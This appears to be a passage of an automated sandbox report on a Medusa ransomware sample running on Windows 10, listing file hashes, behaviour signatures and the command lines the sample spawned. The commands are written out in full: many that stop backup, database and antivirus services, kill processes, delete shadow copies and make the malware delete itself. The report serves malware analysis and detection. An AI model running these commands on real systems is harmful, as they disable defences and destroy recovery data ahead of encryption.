C:\Windows\SysWOW64\net.exe

net stop "TmCCSF" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "TmCCSF" /y

C:\Windows\SysWOW64\net.exe

net stop "tmlisten" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "tmlisten" /y

C:\Windows\SysWOW64\net.exe

net stop "TrueKey" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "TrueKey" /y

C:\Windows\SysWOW64\net.exe

net stop "TrueKeyScheduler" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "TrueKeyScheduler" /y

C:\Windows\SysWOW64\net.exe

net stop "TrueKeyServiceHelper" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "TrueKeyServiceHelper" /y

C:\Windows\SysWOW64\net.exe

net stop "UI0Detect" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "UI0Detect" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamBackupSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamBackupSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamBrokerSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamBrokerSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamCatalogSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamCatalogSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamCloudSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamCloudSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamDeploymentService" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamDeploymentService" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamDeploySvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamDeploySvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamEnterpriseManagerSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamEnterpriseManagerSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamMountSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamMountSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamNFSSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamNFSSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamRESTSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamRESTSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamTransportSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamTransportSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "W3Svc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "W3Svc" /y

C:\Windows\SysWOW64\net.exe

net stop "wbengine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SysWOW64\net.exe

net stop "WRSVC" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "WRSVC" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2" /y

C:\Windows\SysWOW64\net.exe

net stop "VeeamHvIntegrationSvc" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "VeeamHvIntegrationSvc" /y

C:\Windows\SysWOW64\net.exe

net stop "swi_update" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "swi_update" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$CXDB" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$CXDB" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$CITRIX_METAFRAME" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$CITRIX_METAFRAME" /y

C:\Windows\SysWOW64\net.exe

net stop "SQL Backups" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQL Backups" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$PROD" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$PROD" /y

C:\Windows\SysWOW64\net.exe

net stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQLServerADHelper" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQLServerADHelper" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$PROD" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$PROD" /y

C:\Windows\SysWOW64\net.exe

net stop "msftesql$PROD" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "msftesql$PROD" /y

C:\Windows\SysWOW64\net.exe

net stop "NetMsmqActivator" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "NetMsmqActivator" /y

C:\Windows\SysWOW64\net.exe

net stop "EhttpSrv" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "EhttpSrv" /y

C:\Windows\SysWOW64\net.exe

net stop "ekrn" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ekrn" /y

C:\Windows\SysWOW64\net.exe

net stop "ESHASRV" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "ESHASRV" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SOPHOS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SOPHOS" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SOPHOS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SOPHOS" /y

C:\Windows\SysWOW64\net.exe

net stop "AVP" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "AVP" /y

C:\Windows\SysWOW64\net.exe

net stop "klnagent" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "klnagent" /y

C:\Windows\SysWOW64\net.exe

net stop "MSSQL$SQLEXPRESS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "MSSQL$SQLEXPRESS" /y

C:\Windows\SysWOW64\net.exe

net stop "SQLAgent$SQLEXPRESS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQLAgent$SQLEXPRESS" /y

C:\Windows\SysWOW64\net.exe

net stop "wbengine" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "wbengine" /y

C:\Windows\SysWOW64\net.exe

net stop "kavfsslp" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "kavfsslp" /y

C:\Windows\SysWOW64\net.exe

net stop "KAVFSGT" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "KAVFSGT" /y

C:\Windows\SysWOW64\net.exe

net stop "KAVFS" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "KAVFS" /y

C:\Windows\SysWOW64\net.exe

net stop "mfefire" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "mfefire" /y

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM zoolz.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM agntsvc.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM dbeng50.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM dbsnmp.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM encsvc.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM excel.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM firefoxconfig.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM infopath.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM isqlplussvc.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msaccess.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM msftesql.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mspub.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mydesktopqos.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mydesktopservice.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mysqld.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mysqld-nt.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mysqld-opt.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM ocautoupds.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM ocomm.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM ocssd.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM onenote.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM oracle.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM outlook.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM powerpnt.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqbcoreservice.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqlagent.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqlbrowser.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqlservr.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM sqlwriter.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM steam.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM synctime.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM tbirdconfig.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM thebat.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM thebat64.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM thunderbird.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM visio.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM winword.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM wordpad.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM xfssvccon.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM tmlisten.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM PccNTMon.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM CNTAoSMgr.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM Ntrtscan.exe /T

C:\Windows\SysWOW64\taskkill.exe

taskkill /F /IM mbamtray.exe /T

C:\Windows\SysWOW64\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=C: /on=C: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=C: /on=C: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=F: /on=F: /maxsize=401MB

C:\Windows\SysWOW64\vssadmin.exe

vssadmin resize shadowstorage /for=F: /on=F: /maxsize=unbounded

C:\Windows\SysWOW64\vssadmin.exe

vssadmin Delete Shadows /all /quiet

C:\Windows\SysWOW64\cmd.exe

cmd /c ping localhost -n 3 > nul & del C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2180 -s 164

C:\Windows\SysWOW64\PING.EXE

ping localhost -n 3

Network

N/A

Files

F:\!!!READ_ME_MEDUSA!!!.txt

MD5 059811161d1eb0b9c131d4ca58fb273e
SHA1 137cda40b70978a85f34afcd3e8deac116cfe460
SHA256 e2cfaba956d1da00e2f2ab03474876e7d88e5b746c5c38932af32d6abe85d90b
SHA512 73770f346044da39220bbc0c47e271562d394f14b54f30391af15f09df9d7b0a90adcc06745a5b3681c182ec1db03998cbb6d1f100e81626eae87cddd6097fdd

C:\$Recycle.Bin\S-1-5-21-1846800975-3917212583-2893086201-1000\desktop.ini

MD5 05599b3258495dbfb3ef76c9a01d7cbf
SHA1 9624a20b721f836483620a27f12d92f85e692165
SHA256 f84025034449e68ff01b4f87464cd25d737228b4e4bc12be44046c0329a9ae2e
SHA512 43584c1ec686f3abb40dfd4de38c428a99f6a954dcc086cc70bf6332045836607dc4be434ebbde4e0e1645f451ec876d3beb35ad37bb33124633e446aa50da56

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-01 13:23

Reported

2024-10-01 13:26

Platform

win10v2004-20240802-en

Max time kernel

95s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe"

Signatures

Medusa Ransomware

ransomware medusaransomware

Renames multiple (8843) files with added filename extension

ransomware

Boot or Logon Autostart Execution: Active Setup

persistence
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-945322488-2060912225-3527527000-1000\Software\Microsoft\Active Setup\Installed Components | C:\Windows\explorer.exe | N/A

Credentials from Password Stores: Windows Credential Manager

credential_access stealer

Drops startup file

Description | Indicator | Process | Target
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!!!READ_ME_MEDUSA!!!.txt | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\!!!READ_ME_MEDUSA!!!.txt | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\!!!READ_ME_MEDUSA!!!.txt | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!!!READ_ME_MEDUSA!!!.txt | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description | Indicator | Process | Target
File opened for modification | C:\$Recycle.Bin\S-1-5-21-945322488-2060912225-3527527000-1000\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Admin\Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Public\Documents\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Admin\Favorites\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Admin\Pictures\Camera Roll\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Admin\Searches\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Public\Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Public\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Admin\3D Objects\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Admin\Contacts\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Admin\Pictures\Saved Pictures\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Admin\Desktop\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Admin\OneDrive\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Admin\Saved Games\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Public\Videos\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Admin\Links\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Public\Downloads\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Admin\Documents\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Admin\Downloads\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Public\Music\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Admin\Videos\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | C:\Users\Public\Libraries\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification | F:\$RECYCLE.BIN\S-1-5-21-945322488-2060912225-3527527000-1000\desktop.ini | C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe | N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn1\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini C:\Users\Admin\AppData\Local\Temp\2024-10-01_602d720f1184d2ad739568cbf6403331_avoslocker_cobalt-strike.exe N/A
